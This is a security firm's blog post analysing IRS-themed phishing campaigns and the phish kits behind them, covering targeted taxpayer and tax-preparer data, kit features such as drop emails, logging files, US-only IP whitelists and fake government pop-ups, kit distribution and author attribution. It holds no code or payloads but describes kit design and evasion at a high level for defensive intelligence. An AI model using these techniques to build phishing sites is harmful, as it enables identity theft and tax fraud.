Recent Posts

Recent Blog Posts

The PhishLabs Blog

Digging Deeper into IRS Phishing Attacks:  How Do They Work and Who are the Scammers Behind Them?

Recently, the media has been exploding with articles noting a massive increase in tax fraud phishing scams. The IRS publicly announced that they had seen a 400 percent increase in phishing incidents so far this year targeting taxpayers. Phishing is even on the IRS’ “Dirty Dozen” list of scams for the 2016 tax season.

Indeed, our own internal data indicates a marked increase in phishing attacks using fake IRS websites to trick victims into providing extensive amounts of personal and financial information that can be used to file fraudulent tax returns. In fact, the number of IRS phishing sites observed in January of this year was greater than the total number of IRS phish seen in all of 2015

 Trend in IRS Phishing Sites from 2015 to present.

But how do these attacks work?  What information do they target?  And who is behind them?  These are the questions we want to look at in this post to provide a deeper understanding of IRS phishing attacks.

What Information is Being Targeted?

There are two types of targets for IRS phishers: taxpayers and tax professionals.  A majority of IRS phishing scams target taxpayer information.  These attacks vary in scope, but they generally seek to collect any personal, financial, and employment information needed to file a legitimate-looking fraudulent tax return.  Generally speaking, this information will include an individual’s identifying information (name, date of birth, social security number, address), filing status, employer information (company name, EIN, address), and income.  Some phishing sites take an extra step and gather victim spouse and dependent information, electronic filing PIN details, and/or complete W2 data.

Phishers use a variety of different ploys to trick victims into handing over their personal and financial information.  For IRS phishing schemes, the most common technique used to scam taxpayers was to claim that a victim needed to update or verify their information in order for their return to get processed.  Other methods used in these schemes include:

  • Tax return status inquiry
  • Electronic filing PIN request
  • Employment validation
  • Tax transcript request

Scams targeting tax professionals generally look to compromise a tax preparer’s login credentials for the IRS’ e-Services portal.  IRS e-Services is an online platform that allows tax professionals to request client transcripts and file client returns electronically.  Phishing attacks targeting e-Services credentials have been so prevalent this year that the IRS recently sent out a warning to tax preparers alerting them of the scam.

As you can imagine, although there are fewer attacks targeting tax preparers, the amount of damage that could be caused by these attacks has the potential to be far greater.  Not only would a phisher have the ability to request previous tax information for numerous clients at once, but they could also use the application to electronically file fraudulent returns using a vetted source.

IRS2.png           IRS3.png
Example of IRS e-Services phishing pages.

How Sophisticated Are These Attacks?

 Aside from simply observing phishing pages to see what information is being targeted, one of the best ways to learn how a phishing attack works is by studying the phishing kit used to create the site, when available.  Since kits contain all of the files and scripts needed to render the phishing site(s), the amount of intelligence that can be collected from phish kits is invaluable. 

Since the beginning of the year, we have collected more than 120 phish kits targeting IRS tax data.  A large majority of these kits were incredibly simplistic and only included one or two HTML files, a few mailer scripts, and a couple image files. 

The most common method of sending compromised information to a phisher is by using a temporary drop email account.  All of the kits that were analyzed used email to capture victim data; however, a good number of them also created a text file that was posted to the compromised server for later retrieval.  Although we have previously seen phishers using this method to save victim information, it seems to be used more frequently in these types of scams. 

Example of logging compromised information to a locally-stored text (.txt) file.

Very few of the kits had any type of access controls to prevent restricted visitors in the form of HTACCESS files or PHP blacklists.  Usually, these access controls are used to prevent security researchers or web crawlers from visiting and analyzing the site by denying access to particular IP address blocks.  An interesting feature found in one of the kits was an access control whitelist that only allowed visitors to access the phishing page from IP addresses in the United States.  This whitelist technique is actually quite rare in phish kits; however, it makes sense that it would be used in this type of scam, as it would restrict visitors to only those who would likely have legitimate dealings with the IRS.

IP whitelist found in phishing kit.

Another technique that was seen in some of the kits that increased the perceived authenticity of the phishing site was the use of a security pop-up that alerts a visitor that they are using an authorized government system.  The use of this pop-up makes the site seem more genuine and, thus, conditions a potential victim to trust the reason for needing to provide the requested information.

Fake government security alert on IRS phishing page.

How are IRS Phish Kits Distributed?

As we discussed in our 2016 Phishing Trends and Intelligence Report, although there are many individuals who commit phishing attacks, there is only a small population of phishers who are sophisticated enough to write a kit from scratch.  These kit authors sell their kits in places such as Dark Web marketplaces or underground forums, or freely distribute them using social media or file sharing sites (although, these free kits usually include a hidden backdoor that sends compromised information back to the kit author unbeknownst to the kit’s user). 

More than half of the IRS kits collected were found to have originated from free, publicly accessible file sharing sites.  Any would-be scammer could simply locate the page where these kits are being hosted, download them, and use them to create fake IRS webpages.  Because some file sharing sites keep track of the number of times a file has been downloaded, we are able to track the potential spread of kits into the phishing ecosystem.  On a single file sharing site, we identified seven different IRS phish kits that had been downloaded by 98 individuals. 

Example of IRS phish kit freely available on file sharing website.

IRS kits being sold on underground markets or vendor webpages were priced between $20 and $100.    We found some of these paid kits in the wild on live phishing sites; however, not nearly in the same quantity as the free kits.  Many of the paid kits included some additional premium features not seen in free kits, such as IP blocking, field validation, code obfuscation, and message encryption. 

IRS phish kit for sale on vendor webpage.

Who’s Behind These Scams?

Although the identification of an individual committing a phishing attack is often difficult, we are generally able to uncover a great deal of information about phish kit authors, which can provide significant insight into the ultimate origin of the scam.  Whether it’s for marketing purposes or simply to boast about their creations, kit authors usually leave clues to their identity within the HTML pages, scripts, filenames, and directory structure of the kit.  These clues can then be used to identify forums, social media profiles, blogs, and other websites associated with the author.  Very few phish kit authors practice good operational security, which makes attribution possible much of the time. 

For the IRS kits we analyzed, additional attribution information was found for a majority of the kit authors and/or users.  Not surprisingly, many of the IRS phishers that we identified hailed from Nigeria.  One of the most prolific authors, whose kits comprised nearly half of all IRS kits collected since the beginning of the year, is a Pakistani man who, in addition to selling IRS phish kits, sells kits for dozens of other companies in various industries.  His kits were also found being freely distributed on file sharing sites.  We also identified individuals from Indonesia and Syria who were associated with the creation or usage of kits used in IRS phishing attacks.

Wrapping Things Up

Although we have seen a tremendous spike in phishing activity targeting the IRS this tax season, it seems that the kits that fuel these attacks are written and distributed by a relatively small number of people.  Many of the scams are rather unsophisticated, although some phishers have included some more advanced features to enhance the authenticity of their phishing sites and restrict access to the sites to certain visitors.  Because a vast majority of IRS phish kits are distributed openly in hacking forums or on file hosting sites, it gives us an opportunity to better understand the ecosystem that creates these schemes.  By using proactive techniques to identify and disrupt the kit distribution supply chain and infrastructure, there is a potential to mitigate some of these attacks before they occur heading into the next tax season.

Topics: Phishing, Fraud, Phish Kit, Spear Phishing, IRS Phishing Attacks

What's this all about?

The PhishLabs Blog is where we share our insights and thoughts on cybercrime and online fraud.

Recent Posts

Subscribe to Email Updates

Posts by Topic

see all